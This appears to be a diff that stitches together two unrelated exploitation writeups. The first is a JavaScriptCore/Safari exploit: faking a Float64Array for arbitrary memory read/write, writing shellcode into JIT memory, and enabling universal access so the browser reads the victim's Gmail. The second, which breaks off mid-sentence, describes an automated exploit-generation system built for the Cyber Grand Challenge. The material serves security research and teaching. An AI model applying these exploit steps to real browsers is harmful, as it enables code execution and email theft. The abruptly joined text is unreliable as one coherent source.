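// Conceptual model of a Structure: an ordered mapping from property
// names to slot indices into the inline storage (or butterfly).
var structure = [['foo', 0], ['bar', 1]];

// Look up a property by scanning the structure, then index into the
// JSValue slots. Real engines avoid this scan via inline caches.
function getProperty(slots, structure, name) {
    for (var i = 0; i < structure.length; i++) {
        if (structure[i][0] === name)
            return slots[structure[i][1]];
    }
    return undefined;
}

getProperty([42, 43], structure, 'bar');    // 43
```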
+
+So what happens when a new property is added to an object? If this happens
+for the first time then a new Structure instance will be allocated,
+containing the previous slot indices for all existing properties and an
+additional one for the new property. The property would then be stored at
+the corresponding index, possibly requiring a reallocation of the
+butterfly. To avoid repeating this process, the resulting Structure
+instance can be cached in the previous structure, in a data structure
+called a "transition table". The original structure might also be adjusted
+to allocate more inline or butterfly storage up front to avoid the
+reallocation. This mechanism ultimately makes structures reusable.
+
+Time for an example. Suppose we have the following JavaScript code:
+
+    var o = { foo: 42 };
+    if (someCondition)
+        o.bar = 43;
+    else
+        o.baz = 44;
+
+This would result in the creation of the following three Structure
+instances, here shown with the (arbitrary) property name to slot index
+mappings:
+
+    +-----------------+   +bar   +-----------------+
+    |   Structure 1   +--------->|   Structure 2   |
+    |                 |          |                 |
+    | foo: 0          |          | foo: 0          |
+    +--------+--------+          | bar: 1          |
+             |                   +-----------------+
+             |
+             |   +baz            +-----------------+
+             +------------------>|   Structure 3   |
+                                 |                 |
+                                 | foo: 0          |
+                                 | baz: 1          |
+                                 +-----------------+
+
+Whenever this piece of code was executed again, the correct structure for
+the created object would then be easy to find.
+
+Essentially the same concept is used by all major engines today. V8 calls
+them maps or hidden classes [19] while SpiderMonkey calls them Shapes.
+
+This technique also makes speculative JIT compilers simpler. Assume the
+following function:
+
+    function foo(a) {
+        return a.bar + 3;
+    }
+
+Assume further that we have executed the above function a couple of times
+inside the interpreter and now decide to compile it to native code for
+better performance. How do we deal with the property lookup?
+We could simply jump out to the interpreter to perform the lookup, but
+that would be quite expensive. Assume we have also traced the objects that
+were given to foo as arguments and found out that they all used the same
+structure. We can now generate (pseudo-)assembly code like the following.
+Here r0 initially points to the argument object:
+
+    mov r1, [r0 + #structure_id_offset];
+    cmp r1, #structure_id;
+    jne bailout_to_interpreter;
+    mov r2, [r0 + #inline_property_offset];
+
+This is just a few instructions slower than a property access in a native
+language such as C. Note that the structure ID and property offset are
+cached inside the code itself, thus the name for these kinds of code
+constructs: inline caches.
+
+Besides the property mappings, structures also store a reference to a
+ClassInfo instance. This instance contains the name of the class
+("Float64Array", "HTMLParagraphElement", ...), which is also accessible
+from script via the following slight hack:
+
+    Object.prototype.toString.call(object);
+    // Might print "[object HTMLParagraphElement]"
+
+However, the more important property of the ClassInfo is its MethodTable
+reference. A MethodTable contains a set of function pointers, similar to a
+vtable in C++. Most of the object related operations [20] as well as some
+garbage collection related tasks (visiting all referenced objects for
+example) are implemented through methods in the method table. To give an
+idea about how the method table is used, the following code snippet from
+JSArray.cpp is shown.
+This function is part of the MethodTable of the ClassInfo instance for
+JavaScript arrays and will be called whenever a property of such an
+instance is deleted [21] by script:
+
+    bool JSArray::deleteProperty(JSCell* cell, ExecState* exec,
+                                 PropertyName propertyName)
+    {
+        JSArray* thisObject = jsCast<JSArray*>(cell);
+
+        if (propertyName == exec->propertyNames().length)
+            return false;
+
+        return JSObject::deleteProperty(thisObject, exec, propertyName);
+    }
+
+As we can see, deleteProperty has a special case for the .length property
+of an array (which it won't delete), but otherwise forwards the request to
+the parent implementation.
+
+The next diagram summarizes (and slightly simplifies) the relationships
+between the different C++ classes that together build up the JSC object
+system.
+
+          +------------------------------------------+
+          | Butterfly                                |
+          | baz | bar | foo | length: 2 | 42 | 13.37 |
+          +------------------------------------------+
+                         ^
+               +---------+
+               |
+     +----------+
+     |          |
+  +--+  JSCell  |                      +-----------------+
+  |  |          |                      |                 |
+  |  +----------+                      |   MethodTable   |
+  |      /\                            |                 |
+  |      || inherits                   |  Put            |
+  |  +----++----+                      |  Get            |
+  |  |          |                      |  Delete         |
+  |  | JSObject |<---------------------+  VisitChildren  |
+  |  |          |                      |  ...            |
+  |  +----------+                      |                 |
+  |      /\                            +-----------------+
+  |      || inherits                           ^
+  |  +----++----+                              |
+  |  |          |                   associated |
+  |  |  JSArray |                   prototype  |
+  |  |          |                   object     |
+  |  +----------+                              |
+  |                                            |
+  | References by ID                  +--------+-------+
+  | in structure table                |   ClassInfo    |
+  v                                   |                |
+  +-------------------+               | Name: "Array"  |
+  |     Structure     |               |                |
+  |                   +-------------->+----------------+
+  |  property: slot   |
+  |  foo     : 0      |
+  |  bar     : 1      |
+  |  baz     : 2      |
+  |                   |
+  +-------------------+
+
+
+--[ 6 - Exploitation
+
+Now that we know a bit more about the internals of the JSObject class,
+let's get back to creating our own Float64Array instance which will
+provide us with an arbitrary memory read/write primitive.
+Clearly, the most important part will be the structure ID in the JSCell
+header, as the associated structure instance is what makes our piece of
+memory "look like" a Float64Array to the engine. We thus need to know the
+ID of a Float64Array structure in the structure table.
+
+
+----[ 6.1 - Predicting structure IDs
+
+Unfortunately, structure IDs aren't necessarily static across different
+runs as they are allocated at runtime when required. Further, the IDs of
+structures created during engine startup are version dependent. As such we
+don't know the structure ID of a Float64Array instance and will need to
+determine it somehow.
+
+Another slight complication arises since we cannot use arbitrary structure
+IDs. This is because there are also structures allocated for other garbage
+collected cells that are not JavaScript objects (strings, symbols, regular
+expression objects, even structures themselves). Calling any method
+referenced by their method table will lead to a crash due to a failed
+assertion. These structures are only allocated at engine startup though,
+resulting in all of them having fairly low IDs.
+
+To overcome this problem we will make use of a simple spraying approach:
+we will spray a few thousand structures that all describe Float64Array
+instances, then pick a high initial ID and see if we've hit a correct one.
+
+    for (var i = 0; i < 0x1000; i++) {
+        var a = new Float64Array(1);
+        // Add a new property to create a new Structure instance.
+        a[randomString()] = 1337;
+    }
+
+We can find out if we've guessed correctly by using 'instanceof'. If we
+did not, we simply use the next structure.
+
+    while (!(fakearray instanceof Float64Array)) {
+        // Increment structure ID by one here
+    }
+
+'instanceof' is a fairly safe operation as it will only fetch the
+structure, fetch the prototype from that, and do a pointer comparison with
+the given prototype object.
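The spray loop above relies on a randomString() helper that is not shown in the text. Any function that returns a fresh property name on each call will do; a minimal stand-in (an assumption, not the original exploit's implementation) could look like this:

```javascript
// Hypothetical helper: returns a (with overwhelming probability) unique
// property name, so every assignment triggers a new Structure transition.
function randomString() {
    return 's' + Math.random().toString(36).slice(2);
}
```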
+
+
+----[ 6.2 - Putting things together: faking a Float64Array
+
+Float64Arrays are implemented by the native JSArrayBufferView class. In
+addition to the standard JSObject fields, this class also contains the
+pointer to the backing memory (we'll refer to it as 'vector', similar to
+the source code), as well as a length and mode field (both 32-bit
+integers).
+
+Since we place our Float64Array inside the inline slots of another object
+(referred to as 'container' from now on), we'll have to deal with some
+restrictions that arise due to the JSValue encoding. Specifically we
+
+    * cannot set a nullptr butterfly pointer since null isn't a valid
+      JSValue. This is fine for now as the butterfly won't be accessed for
+      simple element access operations
+
+    * cannot set a valid mode field since it has to be larger than
+      0x00010000 due to the NaN-boxing. We can freely control the length
+      field though
+
+    * can only set the vector to point to another JSObject since these are
+      the only pointers that a JSValue can contain
+
+Due to the last constraint we'll set up the Float64Array's vector to point
+to a Uint8Array instance:
+
+    +----------------+            +----------------+
+    |  Float64Array  |    +------>|   Uint8Array   |
+    |                |    |       |                |
+    |    JSCell      |    |       |    JSCell      |
+    |    butterfly   |    |       |    butterfly   |
+    |    vector -----+----+       |    vector      |
+    |    length      |            |    length      |
+    |    mode        |            |    mode        |
+    +----------------+            +----------------+
+
+With this we can now set the data pointer of the second array to an
+arbitrary address, providing us with an arbitrary memory read/write.
+
+Below is the code for creating a fake Float64Array instance using our
+previous exploit primitives. The attached exploit code then creates a
+global 'memory' object which provides convenient methods to read from and
+write to arbitrary memory regions.
+
+    sprayFloat64ArrayStructures();
+
+    // Create the array that will be used to
+    // read and write arbitrary memory addresses.
+    var hax = new Uint8Array(0x1000);
+
+    var jsCellHeader = new Int64([
+        00, 0x10, 00, 00,   // m_structureID, current guess
+        0x0,                // m_indexingType
+        0x27,               // m_type, Float64Array
+        0x18,               // m_flags, OverridesGetOwnPropertySlot |
+                            //   InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero
+        0x1                 // m_cellState, NewWhite
+    ]);
+
+    var container = {
+        jsCellHeader: jsCellHeader.encodeAsJSVal(),
+        butterfly: false,   // Some arbitrary value
+        vector: hax,
+        lengthAndFlags: (new Int64('0x0001000000000010')).asJSValue()
+    };
+
+    // Create the fake Float64Array.
+    var address = Add(addrof(container), 16);
+    var fakearray = fakeobj(address);
+
+    // Find the correct structure ID.
+    while (!(fakearray instanceof Float64Array)) {
+        jsCellHeader.assignAdd(jsCellHeader, Int64.One);
+        container.jsCellHeader = jsCellHeader.encodeAsJSVal();
+    }
+
+    // All done, fakearray now points onto the hax array
+
+To "visualize" the result, here is some lldb output. The container object
+is located at 0x11321e1a0:
+
+    (lldb) x/6gx 0x11321e1a0
+    0x11321e1a0: 0x0100150000001138 0x0000000000000000
+    0x11321e1b0: 0x0118270000001000 0x0000000000000006
+    0x11321e1c0: 0x0000000113217360 0x0001000000000010
+    (lldb) p *(JSC::JSArrayBufferView*)(0x11321e1a0 + 0x10)
+    (JSC::JSArrayBufferView) $0 = {
+      JSC::JSNonFinalObject = {
+        JSC::JSObject = {
+          JSC::JSCell = {
+            m_structureID = 4096
+            m_indexingType = '\0'
+            m_type = Float64ArrayType
+            m_flags = '\x18'
+            m_cellState = NewWhite
+          }
+          m_butterfly = {
+            JSC::CopyBarrierBase = (m_value = 0x0000000000000006)
+          }
+        }
+      }
+      m_vector = {
+        JSC::CopyBarrierBase = (m_value = 0x0000000113217360)
+      }
+      m_length = 16
+      m_mode = 65536
+    }
+
+Note that m_butterfly as well as m_mode are invalid as we cannot write
+null there. This causes no trouble for now but will be problematic once a
+garbage collection run occurs. We'll deal with this later.
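The container setup above leans on reinterpreting raw 64-bit patterns as doubles (encodeAsJSVal/asJSValue in the attached Int64 library). The bit-preserving conversion itself needs nothing beyond standard typed arrays; a self-contained sketch (assuming a little-endian machine):

```javascript
// Reinterpret two 32-bit halves as an IEEE-754 double and back. No
// numeric conversion takes place; the underlying bits stay identical.
var buf = new ArrayBuffer(8);
var u32 = new Uint32Array(buf);
var f64 = new Float64Array(buf);

function bitsToDouble(lo, hi) {    // little-endian: low word first
    u32[0] = lo;
    u32[1] = hi;
    return f64[0];
}

function doubleToBits(d) {
    f64[0] = d;
    return [u32[0], u32[1]];
}

bitsToDouble(0, 0x3ff00000);    // 1, since 0x3ff0000000000000 encodes 1.0
```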
+
+
+----[ 6.3 - Executing shellcode
+
+One nice thing about JavaScript engines is the fact that all of them make
+use of JIT compiling. This requires writing instructions into a page in
+memory and later executing them. For that reason most engines, including
+JSC, allocate memory regions that are both writable and executable. This
+is a good target for our exploit. We will use our memory read/write
+primitive to leak a pointer into the JIT compiled code for a JavaScript
+function, then write our shellcode there and call the function, resulting
+in our own code being executed.
+
+The attached PoC exploit implements this. Below is the relevant part of
+the runShellcode function.
+
+    // This simply creates a function and calls it multiple times to
+    // trigger JIT compilation.
+    var func = makeJITCompiledFunction();
+    var funcAddr = addrof(func);
+    print("[+] Shellcode function object @ " + funcAddr);
+
+    var executableAddr = memory.readInt64(Add(funcAddr, 24));
+    print("[+] Executable instance @ " + executableAddr);
+
+    var jitCodeAddr = memory.readInt64(Add(executableAddr, 16));
+    print("[+] JITCode instance @ " + jitCodeAddr);
+
+    var codeAddr = memory.readInt64(Add(jitCodeAddr, 32));
+    print("[+] RWX memory @ " + codeAddr.toString());
+
+    print("[+] Writing shellcode...");
+    memory.write(codeAddr, shellcode);
+
+    print("[!] Jumping into shellcode...");
+    func();
+
+As can be seen, the PoC code performs the pointer leaking by reading a
+couple of pointers from fixed offsets into a set of objects, starting from
+a JavaScript function object. This isn't great (since offsets can change
+between versions), but suffices for demonstration purposes. As a first
+improvement, one should try to detect valid pointers using some simple
+heuristics (highest bits all zero, "close" to other known memory regions,
+...). Next, it might be possible to detect some objects based on unique
+memory patterns.
+For example, all classes inheriting from JSCell (such as ExecutableBase)
+will start with a recognizable header. Also, the JIT compiled code itself
+will likely start with a known function prologue.
+
+Note that starting with iOS 10, JSC no longer allocates a single RWX
+region but rather uses two virtual mappings to the same physical memory
+region, one of them executable and the other one writable. A special
+version of memcpy is then emitted at runtime which contains the (random)
+address of the writable region as immediate value and is mapped --X,
+preventing an attacker from reading the address. To bypass this, a short
+ROP chain would now be required to call this memcpy before jumping into
+the executable mapping.
+
+
+----[ 6.4 - Surviving garbage collection
+
+If we wanted to keep our renderer process alive past our initial exploit
+(we'll later see why we might want that), we are currently faced with an
+immediate crash once the garbage collector kicks in. This happens mainly
+because the butterfly of our faked Float64Array is an invalid pointer,
+but not null, and will thus be accessed during GC. From
+JSObject::visitChildren:
+
+    Butterfly* butterfly = thisObject->m_butterfly.get();
+    if (butterfly)
+        thisObject->visitButterfly(visitor, butterfly,
+                                   thisObject->structure(visitor.vm()));
+
+We could set the butterfly pointer of our fake array to nullptr, but this
+would lead to another crash since that value is also a property of our
+container object and would be treated as a JSObject pointer. We will thus
+do the following:
+
+    1. Create an empty object. The structure of this object will describe
+       an object with the default amount of inline storage (6 slots), but
+       none of them being used.
+
+    2. Copy the JSCell header (containing the structure ID) to the
+       container object. We've now caused the engine to "forget" about the
+       properties of the container object that make up our fake array.
+
+    3. Set the butterfly pointer of the fake array to nullptr, and, while
+       we're at it, also replace the JSCell of that object with one from a
+       default Float64Array instance
+
+The last step is required since we might end up with the structure of a
+Float64Array with some property due to our structure spraying before.
+
+These three steps give us a stable exploit.
+
+On a final note, when overwriting the code of a JIT compiled function,
+care must be taken to return a valid JSValue (if process continuation is
+desired). Failing to do so will likely result in a crash during the next
+GC, as the returned value will be kept by the engine and inspected by the
+collector.
+
+
+----[ 6.5 - Summary
+
+At this point it is time for a quick summary of the full exploit:
+
+    1. Spray Float64Array structures
+
+    2. Allocate a container object with inline properties that together
+       build up a Float64Array instance in its inline property slots. Use
+       a high initial structure ID which will likely be correct due to the
+       previous spray. Set the data pointer of the array to point to a
+       Uint8Array instance.
+
+    3. Leak the address of the container object and create a fake object
+       pointing to the Float64Array inside the container object
+
+    4. See if the structure ID guess was correct using 'instanceof'. If
+       not, increase the structure ID by assigning a new value to the
+       corresponding property of the container object. Repeat until we
+       have a Float64Array.
+
+    5. Read from and write to arbitrary memory addresses by overwriting
+       the data pointer of the Uint8Array
+
+    6. With that, repair the container and the Float64Array instance to
+       avoid crashing during garbage collection
+
+
+--[ 7 - Abusing the renderer process
+
+Usually, from here the next logical step would be to fire up a sandbox
+escape exploit of some sort for further compromise of the target machine.
+
+Since discussion of these is out of scope for this article, and due to
+good coverage of those in other places, let us instead explore our
+current situation.
+
+
+----[ 7.1 - WebKit process and privilege model
+
+Since WebKit 2 [22] (circa 2011), WebKit features a multi-process model in
+which a new renderer process is spawned for every tab. Besides stability
+and performance reasons, this also provides the basis for a sandboxing
+infrastructure to limit the damage that a compromised renderer process
+can do to the system.
+
+
+----[ 7.2 - The same-origin policy
+
+The same-origin policy (SOP) provides the basis for (client-side) web
+security. It prevents content originating from origin A from interfering
+with content originating from another origin B. This includes script
+level access (e.g. accessing DOM objects inside another window) as well
+as network level access (e.g. XMLHttpRequests). Interestingly, in WebKit
+the SOP is enforced inside the renderer processes, which means we can
+bypass it at this point. The same is currently true for all major web
+browsers, but Chrome is about to change this with their site-isolation
+project [23].
+
+This fact is nothing new and has even been exploited in the past, but it
+is worth discussing. In essence, this means that a renderer process has
+full access to all browser sessions and can send authenticated
+cross-origin requests and read the response. An attacker who compromises
+a renderer process thus obtains access to all the browser sessions of
+the victim.
+
+For demonstration purposes we will now modify our exploit to display the
+user's Gmail inbox.
+
+
+----[ 7.3 - Stealing emails
+
+There is an interesting field inside the SecurityOrigin class in WebKit:
+m_universalAccess. If set, it will cause all cross-origin checks to
+succeed. We can obtain a reference to the currently active SecurityOrigin
+instance by following a set of pointers (whose offsets are again
+dependent on the current Safari version).
+We can then enable universalAccess for our renderer process and can
+subsequently perform authenticated cross-origin XMLHttpRequests. Reading
+emails from Gmail then becomes as simple as
+
+    var xhr = new XMLHttpRequest();
+    xhr.open('GET', 'https://mail.google.com/mail/u/0/#inbox', false);
+    xhr.send();  // xhr.responseText now contains the full response
+
+Included is a version of the exploit that does this and displays the
+user's current Gmail inbox. For reasons that should be clear by now this
+does require a valid Gmail session in Safari ;)
+
+
+--[ 8 - References
+
+[1] http://www.zerodayinitiative.com/advisories/ZDI-16-485/
+[2] https://webkit.org/blog/3362/introducing-the-webkit-ftl-jit/
+[3] http://trac.webkit.org/wiki/JavaScriptCore
+[4] http://www.ecma-international.org/
+ecma-262/6.0/#sec-ecmascript-data-types-and-values
+[5] http://www.ecma-international.org/ecma-262/6.0/#sec-objects
+[6] https://en.wikipedia.org/wiki/Double-precision_floating-point_format
+[7] http://www.ecma-international.org/
+ecma-262/6.0/#sec-array-exotic-objects
+[8] http://www.ecma-international.org/
+ecma-262/6.0/#sec-ecmascript-standard-built-in-objects
+[9] https://developer.mozilla.org/en-US/docs/Web/JavaScript/
+Reference/Global_Objects/Array/slice
+[10] https://github.com/WebKit/webkit/
+blob/320b1fc3f6f47a31b6ccb4578bcea56c32c9e10b/Source/JavaScriptCore/runtime
+/ArrayPrototype.cpp#L848
+[11] https://developer.mozilla.org/en-US/docs/Web/
+JavaScript/Reference/Global_Objects/Symbol/species
+[12] http://www.ecma-international.org/ecma-262/6.0/#sec-type-conversion
+[13] https://bugzilla.mozilla.org/show_bug.cgi?id=735104
+[14] https://bugzilla.mozilla.org/show_bug.cgi?id=983344
+[15] https://bugs.chromium.org/p/chromium/issues/detail?id=554946
+[16] https://www.gnu.org/software/guile/manual/html_node/
+Conservative-GC.html
+[17] http://www.ecma-international.org/
+ecma-262/6.0/#sec-ecmascript-language-types-number-type
+[18] http://www.ecma-international.org/ecma-262/6.0/#sec-typedarray-objects
+[19] https://developers.google.com/v8/design#fast-property-access
+[20] http://www.ecma-international.org/
+ecma-262/6.0/#sec-operations-on-objects
+[21] http://www.ecma-international.org/ecma-262/6.0/
+#sec-ordinary-object-internal-methods-and-internal-slots-delete-p
+[22] https://trac.webkit.org/wiki/WebKit2
+[23] https://www.chromium.org/developers/design-documents/site-isolation
+
+
+--[ 9 - Source code
+
+[ uuencoded src.zip omitted ]
+                        AFL
+                         |
+           +-------------+-------------+
+           |                           |
+       Symbolic                     Genetic
+       Tracing         <=====       Fuzzing
+
+There are a few things we considered when we thought about how we wanted
+to find bugs in the Cyber Grand Challenge. Firstly, we will need to craft
+exploits using the bugs we find. As a result, we need to use techniques
+which generate inputs that trigger the bugs, not just point out that
+there could be a bug. Secondly, the bugs might be guarded by specific
+checks such as matching a command argument, password or checksum. Lastly,
+the programs which we need to analyze might be large, so we need
+techniques which scale well.
+
+The automated bug finding techniques can be divided into three groups:
+static analysis, fuzzing, and symbolic execution. Static analysis is not
+too useful as it doesn't generate inputs which actually trigger the bug.
+Symbolic execution is great for generating inputs which pass difficult
+checks; however, it scales poorly to large programs. Fuzzing can handle
+fairly large programs, but struggles to get past difficult checks. The
+solution we came up with is to combine fuzzing and symbolic execution
+into a state-of-the-art guided fuzzer, called Driller.
Driller uses a mutational fuzzer to exercise components within the
+binary, and then uses symbolic execution to find inputs which can reach
+a different component.
+
+* Fuzzing
+
+Driller leverages a popular off-the-shelf fuzzer, American Fuzzy Lop.
+AFL uses instrumentation to identify the transitions that a particular
+input exercises when it is passed to the program. These transitions are
+tuples of source and destination basic blocks in the control flow graph.
+New transition tuples often represent functionality, or code paths, that
+have not been exercised before; consequently, inputs containing new
+transition tuples are prioritized by the fuzzer.
+
+To facilitate the instrumentation, we use a fork of QEMU, which enables
+the execution of DECREE binaries. Some minor modifications were made to
+the fuzzer and to the emulation of DECREE binaries to enable faster
+fuzzing as well as finding deeper bugs:
+
+- De-randomization
+  Randomization by the program interferes with the fuzzer's evaluation
+  of inputs: an input that hits an interesting transition with one
+  random seed may not hit it with a different random seed. Removing
+  randomness allows the fuzzer to explore sections of the program which
+  may be guarded by randomness, such as "challenge-response" exchanges.
+  During fuzzing, we ensure that the flag page is initialized with a
+  constant seed, and that the random system call always returns constant
+  values, so there is no randomness in the system. The Exploitation
+  component of our CRS is responsible for handling the removal of
+  randomness.
+
+- Double Receive Failure
+  The receive system call fails after the input has been completely read
+  in by the program and the file descriptor has been closed. Any binary
+  which does not check the error code for this failure may enter an
+  infinite loop, which slows down the fuzzer dramatically. 
To prevent
+  this behavior, if the receive system call fails twice because the
+  end-of-file has been reached, the program is terminated immediately.
+
+- At-Receive Fork Server
+  AFL employs a fork server, which forks the program for each execution
+  of an input, speeding up fuzzing by avoiding costly system calls and
+  initialization. Given that the binary has been de-randomized as
+  described above, all executions of it must be identical up until the
+  first call to receive, which is the first point at which non-constant
+  data may enter the system. This allows the fork server to be moved
+  from the entry point of the program to right before the first call to
+  receive. If there is any costly initialization of globals and data
+  structures, this modification speeds up the fuzzing process greatly.
+
+* Network Seeds
+
+Network traffic can contain valuable seeds which can be given to the
+fuzzer to greatly increase its effectiveness. Functionality tests
+exercise deep functionality within the program, and network traffic from
+exploits may exercise the particular functionality which is buggy. To
+generate seeds from the traffic, each input to the program is run with
+the instrumentation from QEMU to identify whether it hits any
+transitions which have not been found before. If so, the input is
+considered interesting and is added as a seed for the fuzzer.
+
+* Adding Symbolic Execution
+
+Although symbolic execution is slow and costly, it is extremely
+powerful. Symbolic execution uses a constraint solver to generate
+specific inputs which will exercise a given path in the binary. As such,
+it can produce inputs which pass a difficult check such as a password, a
+magic number, or even a checksum. However, an approach based entirely on
+symbolic execution will quickly succumb to path explosion, as the number
+of paths through the binary increases exponentially with each branch.
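
The transition-tuple bookkeeping described above (both the fuzzer's input
prioritization and the "interesting seed" test applied to network
traffic) can be sketched in a few lines. This is a minimal illustration
of AFL's coverage-map idea; the class and function names and the stub
traces are ours, not AFL's or Driller's actual API:

```python
# Sketch of AFL-style transition-tuple coverage. A real trace of basic
# block addresses would come from the QEMU instrumentation; here it is
# just a list of integers.

MAP_SIZE = 1 << 16  # AFL keeps a 64 KiB shared coverage bitmap


def tuple_index(prev_block, cur_block):
    # AFL hashes the (source, destination) edge as (prev >> 1) ^ cur,
    # truncated to the size of the coverage map.
    return ((prev_block >> 1) ^ cur_block) % MAP_SIZE


class Coverage:
    def __init__(self):
        self.seen = set()  # transition tuples hit by any input so far

    def is_interesting(self, block_trace):
        # An input is interesting (kept as a seed / prioritized) if it
        # exercises at least one source->destination transition that no
        # earlier input has exercised.
        new = False
        for prev, cur in zip(block_trace, block_trace[1:]):
            idx = tuple_index(prev, cur)
            if idx not in self.seen:
                self.seen.add(idx)
                new = True
        return new


cov = Coverage()
assert cov.is_interesting([0x8048000, 0x8048010, 0x8048020])  # new edges
assert not cov.is_interesting([0x8048000, 0x8048010])  # nothing new
```

Note that hashing edges into a fixed-size map means distinct transitions
can collide; AFL accepts this imprecision in exchange for a constant-size
bitmap that is cheap to update from instrumented code.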
+
+Driller mitigates the path-explosion problem by tracing only the paths
+which the fuzzer, AFL, finds interesting. This set of paths is often
+small enough that tracing the inputs in it is feasible within the time
+constraints of the competition. During each symbolic trace, Driller
+attempts to identify transitions that have not yet been exercised by the
+fuzzer and, if possible, generates an input which will deviate from the
+trace and take a new transition instead. These new inputs are fed back
+into the fuzzer, where they will be further mutated to continue
+exercising deeper paths, following the new transitions.
+
+* Symbolic Tracing
+
+To ensure that the symbolic trace performed with angr's concolic
+execution engine is identical to the native execution trace, we use
+pre-constraining. In pre-constrained execution, each byte of input is
+constrained to match the original byte of input that was used by the
+fuzzer. When a branch is reached that would lead to a new transition,
+the pre-constraints are removed and the solver is queried for an input
+which reaches the new transition. Pre-constraining also greatly improves
+execution time: since every variable has only one possible value, no
+expensive solver queries are needed to determine the locations of memory
+reads and writes.
+
+
+
+
+
+--[ 003 - The Exploiting Component
+
+
+        Crashes                                     Inputs
+          ||                                          ||
+          ||                                          ||
+          ========================                    ||
+          ||                  ||                      ||
+          ||                  ||                      ||
+          \/                  \/                      \/
+ --------------------  --------------------  --------------------
+ |       REX        |  |    PovFuzzer     |  |    Colorguard    |
+ |                  |  |                  |  |                  |
+ |  ++++++++++++++  |  |  ++++++++++++++  |  |  ++++++++++++++  |
+ |  +  Advanced  +  |  |  +  Fuzzing   +  |  |  +  Finding   +  |
+ |  +    AEG     +  |  |  +    For     +  |  |  +   Leaks    +  |
+ |  +            +  |  |  +  Exploits  +  |  |  +            +  |
+ |  ++++++++++++++  |  |  ++++++++++++++  |  |  ++++++++++++++  |
+ |                  |  |                  |  |                  |
+ |       ...        |  |                  |  |                  |
+ --------------------  --------------------  --------------------
+         ||                    ||                    ||
+         ================================================
+                               ||
+                               \/
+                              POVs
+
+
+* Exploitation
+
+In the Cyber Grand Challenge, stealing flags is a little different from
+ordinary Capture the Flag games. Instead of reading a secret "flag" file
+and submitting its contents to the organizers, an exploit is
+demonstrated by submitting a Proof of Vulnerability (POV), which the
+organizers will run.
+
+A POV is a binary program which communicates with the opponent's binary
+and "exploits" it. There are two ways in which a POV can be considered
+successful:
+- Type 1: Cause a segmentation fault where the instruction pointer and
+          one additional register have values which were previously
+          negotiated with the competition infrastructure. The POV must
+          control at least 20 bits of EIP as well as 20 bits of the
+          other register.
+- Type 2: Read 4 contiguous bytes from the secret flag data. The flag
+          data is located at 0x4347c000-0x4347cfff and is randomly
+          initialized by the kernel.
+
+Different types of vulnerabilities might lend themselves to a specific
+type of POV. For example, a vulnerability where the user can control the
+address passed to puts() might only be usable as a Type 2 POV. On the
+other hand, a stack-based buffer overflow can clearly be used to create
+a Type 1 exploit simply by setting a register and EIP, but it can also
+be used to create a Type 2 exploit by using Return Oriented Programming
+or by jumping to shellcode which prints data from the flag page.
+
+* Overview
+
+The basic design of Mechanical Phish's automatic exploitation is to take
+crashes, triage them, and modify them to create exploits. Mechanical
+Phish does not need to understand the root cause of the bug; instead, it
+only needs to identify which registers and memory it controls at crash
+time, and how those values can be set to produce a POV. 
We created two systems which
+are designed to go from crashes to exploits.
+
+- PovFuzzer
+  Executes the binary repeatedly, slightly modifying the input and
+  tracking the relationship between input bytes and registers at the
+  crash point. This method is fast, but cannot handle complex cases.
+
+- Rex
+  Symbolically executes the input, tracking formulas for all registers
+  and memory values, then applies "techniques" to this state, such as
+  jumping to shellcode or return oriented programming, to create a POV.
+
+This design was still missing one important thing: for some challenges,
+the buggy functionality does not result in a crash! Consider a buffer
+over-read, where the program reads past the end of a buffer. This may
+not cause a crash, but if a copy of the flag data sits there, the
+program will print the secret data. To handle this, we added a third
+component.
+
+- Colorguard
+  Traces the execution of a binary with a particular input and checks
+  for flag data being leaked out. If flag data is leaked, it uses the
+  symbolic formulas to determine whether it can produce a valid POV.
+
+
+--[ 003.001 - PovFuzzer
+
+The PovFuzzer takes a crash and repeatedly changes a single byte at a
+time until it can determine which bytes control EIP as well as another
+register. Then a Type 1 POV can be constructed which simply chooses the
+input bytes that correspond to the negotiated EIP and register values,
+inserts those bytes into the payload, and sends it to the target
+program.
+
+For crashes which occur on a dereference of controlled data, the
+PovFuzzer chooses bytes that cause the dereference to point to the flag
+page, in the hope that flag data will be printed out. After pointing the
+dereference at the flag page, it executes the program to check whether
+flag data is printed out. If so, it constructs a Type 2 POV using that
+input.
+
+The PovFuzzer has many limitations. It cannot handle cases where
+register values are computed in a non-trivial manner, such as through
+multiplication. 
Furthermore, it cannot
+handle the construction of more complex exploits, such as jumping to
+shellcode, or cases where it needs to replay a random value printed by
+the target program. Even so, it is useful for a couple of reasons.
+Firstly, it is much faster than Rex, because it only needs to execute
+the program concretely. Secondly, although we don't like to admit it,
+angr might still have occasional bugs, and the PovFuzzer is a good
+fallback in those cases as it doesn't rely on angr.
+
+
+--[ 003.002 - Rex
+
+The general design of Rex is to take a crashing payload and use angr to
+symbolically trace the program with it, collecting symbolic formulas for
+all memory and input along the way. Once we hit the point where the
+program crashes, we stop tracing, but use the constraint solver to pick
+values that either make the crash a valid POV or avoid the crash to
+explore further. There are many ways we can choose to constrain the
+values at this point, each of which tries to exploit the program in a
+different way. These methods of exploiting the program are called
+"techniques".
+
+One quick thing to note here is that we include a constraint solver in
+our POVs. By including a constraint solver, we can simply add all of the
+constraints collected during tracing and exploitation into the POV and
+then ask the constraint solver at runtime for a solution that matches
+the negotiated values. The constraint solver, as well as angr, operates
+on bit-vectors, enabling the techniques to be bit-precise.
+
+Here we describe the various "techniques" which Rex employs.
+
+- Circumstantial Exploit
+  This technique is applicable to ip-overwrite crashes and is the
+  simplest technique. It determines whether at least 20 bits of the
+  instruction pointer and one register are controlled by user input. If
+  so, an exploit is constructed that negotiates the register and ip
+  values and then solves the constraints to determine the user input
+  that sets them correctly.
+ +- Shellcode Exploit + Also only applicable to ip-overwrites, this technique will search for + regions of executable memory that are controlled by user input. The + largest region of controlled executable memory is chosen and the + memory there is constrained to be a nop-sled followed by shellcode to + either prove a type-1 or type-2 vulnerability. A shellcode exploit + can function even if the user input only controls the ip value, and + not an additional register. + +- ROP Exploit + Although the stack is executable by default, opponents might employ + additional protections that prevent jumping to shellcode, such as + remapping the stack, primitive Address Randomization or even some + form of Control Flow Integrity. Return Oriented Programming (ROP) can + bypass incomplete defenses and still prove vulnerabilities for + opponents that employ them. It is applicable for ip-overwrite crashes + as long as there is user data near the stack pointer, or the binary + contains a gadget to pivot the stack pointer to the user data. + +- Arbitrary Read - Point to Flag + A crash that occurs when the program tries to dereference user- + controlled data is considered an "arbitrary read". In some cases, by + simply constraining the address that will be dereferenced to point at + flag data, the flag data will be leaked to stdout, enabling the + creation of a type-2 